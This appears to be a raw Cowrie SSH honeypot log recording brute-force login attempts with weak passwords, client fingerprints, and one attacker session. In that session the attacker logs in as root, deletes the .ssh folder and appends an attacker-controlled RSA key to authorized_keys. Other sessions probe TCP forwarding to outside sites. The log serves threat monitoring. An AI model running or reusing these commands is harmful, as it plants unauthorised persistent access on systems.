{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:23:26.279204Z","src_ip":"201.148.180.50","session":"19b9c55734d9"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:23:26.280263Z","src_ip":"201.148.180.50","session":"19b9c55734d9"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:23:32.287661Z","src_ip":"212.227.125.160","session":"2d5921a19e44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33402,"dst_ip":"1.2.3.4","dst_port":22,"session":"b08ea926b69a","protocol":"ssh","message":"New connection: 212.227.125.160:33402 (1.2.3.4:22) [session: b08ea926b69a]","sensor":"my-vps","timestamp":"2025-08-31T00:23:37.329216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:23:37.990830Z","src_ip":"212.227.125.160","session":"b08ea926b69a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:23:37.991560Z","src_ip":"212.227.125.160","session":"b08ea926b69a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssw0rd123","message":"login attempt [admin/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:23:39.238582Z","src_ip":"212.227.125.160","session":"b08ea926b69a"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:23:40.521837Z","src_ip":"212.227.125.160","session":"b08ea926b69a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40702,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d2ebba6ad62","protocol":"ssh","message":"New connection: 212.227.235.229:40702 (1.2.3.4:22) [session: 4d2ebba6ad62]","sensor":"my-vps","timestamp":"2025-08-31T00:23:44.156025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:23:44.156905Z","src_ip":"212.227.235.229","session":"4d2ebba6ad62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:23:44.458991Z","src_ip":"212.227.235.229","session":"4d2ebba6ad62"}
{"eventid":"cowrie.login.success","username":"root","password":"123789456","message":"login attempt [root/123789456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:23:45.735995Z","src_ip":"212.227.235.229","session":"4d2ebba6ad62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:23:46.356243Z","src_ip":"212.227.235.229","session":"4d2ebba6ad62"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:23:46.357009Z","src_ip":"212.227.235.229","session":"4d2ebba6ad62"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:23:46.358032Z","src_ip":"212.227.235.229","session":"4d2ebba6ad62"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:23:46.673557Z","src_ip":"212.227.235.229","session":"4d2ebba6ad62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:23:47.747144Z","src_ip":"212.227.235.229","session":"4d2ebba6ad62"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:23:47.747912Z","src_ip":"212.227.235.229","session":"4d2ebba6ad62"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:23:48.052172Z","src_ip":"212.227.235.229","session":"4d2ebba6ad62"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:23:48.053113Z","src_ip":"212.227.235.229","session":"4d2ebba6ad62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47836,"dst_ip":"1.2.3.4","dst_port":22,"session":"43d3a23f90ec","protocol":"ssh","message":"New connection: 212.227.235.229:47836 (1.2.3.4:22) [session: 43d3a23f90ec]","sensor":"my-vps","timestamp":"2025-08-31T00:23:48.347154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:23:48.347986Z","src_ip":"212.227.235.229","session":"43d3a23f90ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:23:48.647204Z","src_ip":"212.227.235.229","session":"43d3a23f90ec"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:23:49.885618Z","src_ip":"212.227.235.229","session":"43d3a23f90ec"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:23:51.188210Z","src_ip":"212.227.235.229","session":"43d3a23f90ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52238,"dst_ip":"1.2.3.4","dst_port":22,"session":"2252d8186dc4","protocol":"ssh","message":"New connection: 212.227.235.229:52238 (1.2.3.4:22) [session: 2252d8186dc4]","sensor":"my-vps","timestamp":"2025-08-31T00:23:51.493264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:23:51.494240Z","src_ip":"212.227.235.229","session":"2252d8186dc4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:23:51.798891Z","src_ip":"212.227.235.229","session":"2252d8186dc4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:23:53.060994Z","src_ip":"212.227.235.229","session":"2252d8186dc4"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:23:53.368334Z","src_ip":"212.227.235.229","session":"2252d8186dc4"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:23:53.369213Z","src_ip":"212.227.235.229","session":"4d2ebba6ad62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55844,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e6f226a2b31","protocol":"ssh","message":"New connection: 212.227.235.229:55844 (1.2.3.4:22) [session: 1e6f226a2b31]","sensor":"my-vps","timestamp":"2025-08-31T00:24:17.849948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:24:18.852573Z","src_ip":"212.227.235.229","session":"1e6f226a2b31"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:24:18.853656Z","src_ip":"212.227.235.229","session":"1e6f226a2b31"}
{"eventid":"cowrie.login.failed","username":"admin","password":"letmein","message":"login attempt [admin/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T00:24:24.807830Z","src_ip":"212.227.235.229","session":"1e6f226a2b31"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:24:26.694626Z","src_ip":"212.227.235.229","session":"1e6f226a2b31"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":24987,"dst_ip":"1.2.3.4","dst_port":22,"session":"b72586fbcddd","protocol":"ssh","message":"New connection: 77.83.207.83:24987 (1.2.3.4:22) [session: b72586fbcddd]","sensor":"my-vps","timestamp":"2025-08-31T00:24:37.615837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:24:37.616609Z","src_ip":"77.83.207.83","session":"b72586fbcddd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T00:24:37.665589Z","src_ip":"77.83.207.83","session":"b72586fbcddd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:24:37.913137Z","src_ip":"77.83.207.83","session":"b72586fbcddd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":31685,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:31685","sensor":"my-vps","timestamp":"2025-08-31T00:24:37.963569Z","session":"b72586fbcddd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T00:24:38.013324Z","src_ip":"77.83.207.83","session":"b72586fbcddd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":8408,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:8408","sensor":"my-vps","timestamp":"2025-08-31T00:24:38.156031Z","session":"b72586fbcddd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T00:24:38.206345Z","src_ip":"77.83.207.83","session":"b72586fbcddd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":21213,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:21213","sensor":"my-vps","timestamp":"2025-08-31T00:24:38.348237Z","session":"b72586fbcddd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T00:24:38.398003Z","src_ip":"77.83.207.83","session":"b72586fbcddd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:24:38.451280Z","src_ip":"77.83.207.83","session":"b72586fbcddd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47126,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa518c6a4052","protocol":"ssh","message":"New connection: 212.227.125.160:47126 (1.2.3.4:22) [session: fa518c6a4052]","sensor":"my-vps","timestamp":"2025-08-31T00:24:40.187986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:24:41.063825Z","src_ip":"212.227.125.160","session":"fa518c6a4052"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:24:41.065055Z","src_ip":"212.227.125.160","session":"fa518c6a4052"}
{"eventid":"cowrie.login.failed","username":"admin","password":"letmein","message":"login attempt [admin/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T00:24:42.796335Z","src_ip":"212.227.125.160","session":"fa518c6a4052"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49332,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef017ca81470","protocol":"ssh","message":"New connection: 212.227.235.229:49332 (1.2.3.4:22) [session: ef017ca81470]","sensor":"my-vps","timestamp":"2025-08-31T00:24:42.997969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:24:42.998630Z","src_ip":"212.227.235.229","session":"ef017ca81470"}
